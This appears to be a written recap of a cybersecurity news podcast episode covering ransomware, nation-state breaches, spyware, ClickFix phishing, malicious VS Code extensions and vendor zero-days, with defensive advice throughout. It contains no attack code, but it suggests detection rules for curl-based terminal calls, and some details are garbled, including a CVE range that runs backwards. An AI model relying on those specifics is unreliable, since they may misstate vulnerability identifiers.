Good Morning Security Gang
Good morning, Security Gang — and happy Monday! James Azar here, and welcome back to the CyberHub Podcast. Episode 1008, November 10th, 2025. We’re rolling into Veterans Day week — a day I personally hold close to my heart. It’s the day we celebrate those who volunteered to put on the uniform and defend this country. Tomorrow, raise your coffee mug or glass to a veteran you know. Memorial Day is for the fallen. Veterans Day is for the living — and they deserve your gratitude.
Now, today’s show is loaded: we’re doing a full autopsy on Nevada’s ransomware incident, a Congressional Budget Office cyberattack with nation-state fingerprints, a $5.1 million fine that screams “identity hygiene 101,” a Samsung spyware zero-day, a MacOS phishing upgrade, AI-powered supply chain trojans, seven QNAP zero-days, and more Cisco chaos. Oh, and Google’s $32 billion acquisition of Wiz just got cleared by the DOJ.
So strap in, double shot espresso in hand — coffee cup cheers, y’all!
Nevada Ransomware: Anatomy of a Statewide Breach
The State of Nevada’s ransomware incident has been fully dissected, and the numbers are in. The initial infection came from a spoofed site download on May 14, planting a backdoor that attackers later used to wipe backups and encrypt virtual machines by August 24. The impact? 60+ state agencies, including the DMV, DHHS, and Department of Public Safety.
Here’s the silver lining — Nevada didn’t pay. They recovered 90% of their data in 28 days, spending $1.3 million on IR, vendor support, and insurance claims. The bad news? 26 accounts were compromised through RDP and remote monitoring misuse, and one confirmed data file was stolen.
Lessons:
Block typosquat downloads.
Enforce application control for installers.
Segment and isolate backups — make them immutable.
Rotate credentials on remote tools.
And practice your 28-day recovery plan — don’t assume backups will save you unless you’ve tested the restore process.
CBO Cyberattack: Nation-State Hackers Breach Congressional Systems
The Congressional Budget Office confirmed a nation-state intrusion that compromised internal messaging and chat data with congressional staffers. Investigators say the breach likely exposed policy-sensitive communications — valuable for foreign intelligence and disinformation efforts.
The CBO has since contained the incident, tightened monitoring, and rolled out new controls. But the real risk lies in long-tail spear phishing campaigns aimed at policymakers and aides.
If you’re managing executive communications:
Enforce phishing-resistant MFA (app-based, not text).
Lock down message exports and retention policies.
Monitor mailbox permission changes.
And enable conditional access for shared inboxes and legislative teams.
Illuminate Fined $5.1 Million for Credential Negligence
Here’s a masterclass in bad hygiene: Education tech firm Illuminate (now rebranded as Renaissance) has been fined $5.1 million by attorneys general in California, Connecticut, and New York for the 2021 data breach that exposed student medical and special education records.
The cause? Stale credentials from an ex-employee were reused by the attacker. Illuminate also failed to segregate backups from production and made false privacy claims about its security posture.
The fallout: millions of minors’ data leaked, 49 states affected, and a full brand overhaul. The takeaway? Account offboarding isn’t optional — it’s survival. Delete old credentials, verify backups are isolated, and audit your privacy promises before regulators do it for you.
Landfall Android Spyware Targets Samsung Devices
The Landfall spyware is back, exploiting a zero-day in Samsung devices via WhatsApp message delivery. Palo Alto Networks identified overlaps with CVE-2025-21043, patched back in April, suggesting targeted zero-click exploits.
This campaign targets high-value individuals, likely for surveillance. If you’re on Android, update immediately. Security teams managing mobile fleets should enforce MDM patch compliance, restrict sideloading, and monitor for unauthorized messaging permissions.
MacOS “ClickFix” Social Engineering Evolves
Mac users, beware — the new wave of ClickFix attacks mimics Cloudflare verification pages and uses fake countdowns and tutorials to trick users into running terminal commands. These are now dropping InfoStealer variants like Seamus and Amos via disguised “how-to” guides.
Mitigation steps:
Use browser isolation for untrusted sites.
Add EDR rules for clipboard or curl-based terminal calls.
Train users specifically on ClickFix-style phishing.
The adversaries are blending UX design with malware deployment, and it’s working frighteningly well.
“You always want to block typosquat downloads. You should enforce application control for installers. You should segment and lock backup networks – they should be immutable, they should be out of bounds. I say you should rehearse a recovery playbook, period.” James Azar
GlassWorm Supply Chain Attack Infects Dev Ecosystem
The GlassWorm campaign has returned with three new malicious VS Code extensions published to the Open VSX registry, using Unicode obfuscation and Solana transactions for C2 operations.
Targets include developers, crypto wallets, and government IT teams, with over 60 victims confirmed globally. The infected extensions — ai-driven-dev.ai, hamu.history-in-sublime-merge, and yasayuki.transient-emacs — have been downloaded 10,000+ times combined.
Recommendations:
Blocklist infected extensions.
Enforce publisher provenance for internal dev tools.
Rotate developer tokens and shorten TTLs.
Run secret scanning and monitor for Solana RPC beacons in build environments.
This is the new battleground — the developer’s workstation.
QNAP Patches Seven Critical Zero-Days
After the Pwn2Own Ireland contest, QNAP has patched seven zero-days affecting QTS, HBS3, and QUTS Hero systems. These bugs (CVE-2025-62847 through CVE-2025-11837) could lead to data theft, crypto-locking, and backup compromise.
Admins should:
Update to the latest firmware versions.
Restrict admin UI to VPN access.
Rotate NAS credentials and monitor for new sync jobs.
These storage systems are constant APT targets — unpatched QNAP boxes are effectively open doors.
Cisco ASA Zero-Days Now Used in Denial-of-Service Attacks
Cisco’s chained zero-days — CVE-2025-20362 and CVE-2025-20333 — are now being weaponized for denial-of-service attacks on unpatched ASA and FTD firewalls. The Acrane Door group, linked to a state actor, is leveraging these to force device reboots and disrupt corporate networks.
If you’re running Cisco perimeter hardware:
Patch immediately.
Decommission end-of-life ASAs.
Restrict management interfaces by geography and ASN.
Continuously hunt for LineDancer or LineRunner artifacts.
Thirty-four thousand devices remain vulnerable — don’t be one of them.
EU Expands Biometric Surveillance, Sparking Civil Liberty Concerns
The European Parliament has voted to expand data sharing and biometric collection under the guise of anti-trafficking and anti-smuggling initiatives. Privacy groups warn this effectively greenlights mass surveillance across EU borders.
“I love how Europe’s always going after civil liberties by saying, ‘Look, we just want to fight human trafficking and migrant smuggling.’ So you created a problem with your own laws in the EU parliament when you allowed unvetted migrants and gangs to come into your continent. Now you want to go after the civil liberties of your dual citizens to do just that.” James Azar
Europe, once the privacy champion of the digital world, now risks repeating the same overreach it criticizes in others. It’s a lesson in how fear-driven regulation can erode the very freedoms it aims to protect.
Google’s $32 Billion Wiz Acquisition Cleared by DOJ
The U.S. Department of Justice has approved Google’s $32 billion acquisition of Wiz, one of the largest cybersecurity deals in history. The acquisition, initiated in March 2025, is now expected to close in early 2026 pending international review.
For the industry, this marks a major milestone — a sign of big tech’s deepening investment in cloud-native security platforms. Wiz CEO Assaf Rappaport called it “the next step in securing the cloud’s foundation.”
Whether this accelerates innovation or consolidates control — time will tell. But for now, it’s a defining moment for cybersecurity as a business driver, not just a risk domain.
Action List
🔐 Segment backups and make them immutable.
🧑💻 Delete stale credentials immediately after offboarding.
📱 Update all Samsung and Android devices to the latest firmware.
🍎 Train users on MacOS ClickFix phishing tactics.
🧩 Audit VS Code and Open VSX extensions for malicious code.
🧱 Patch QNAP and Cisco ASA systems before end of day.
🌍 Review privacy policies under new EU surveillance directives.
💰 Monitor the Wiz acquisition impact on cloud vendor dependencies.
Memorable Quotes by James Azar
“They didn’t hack in — they logged in, again.”
“Complacency isn’t a vulnerability; it’s an exploit waiting to happen.”
James Azar’s CISO’s Take
This episode felt like a masterclass in modern failure modes — from ransomware resilience in Nevada to hygiene negligence at Illuminate, and from spyware weaponization on Android to supply chain breaches hitting developers. The pattern is crystal clear: complexity without discipline equals exposure.
My biggest takeaway? Security isn’t just about patching code — it’s about patching habits. Old accounts, untested backups, unverified extensions — these are the cracks adversaries exploit. We’re seeing the same themes across states, schools, enterprises, and governments: lack of preparation, poor segmentation, and blind trust in systems we never fully controlled.
The good news? Every story today had a recovery path. The bad news? Most of those recoveries came after impact. So take this as your Monday reminder, Security Gang — build resilience before the breach, not after.
Stay sharp, stay caffeinated, and as always — stay cyber safe.
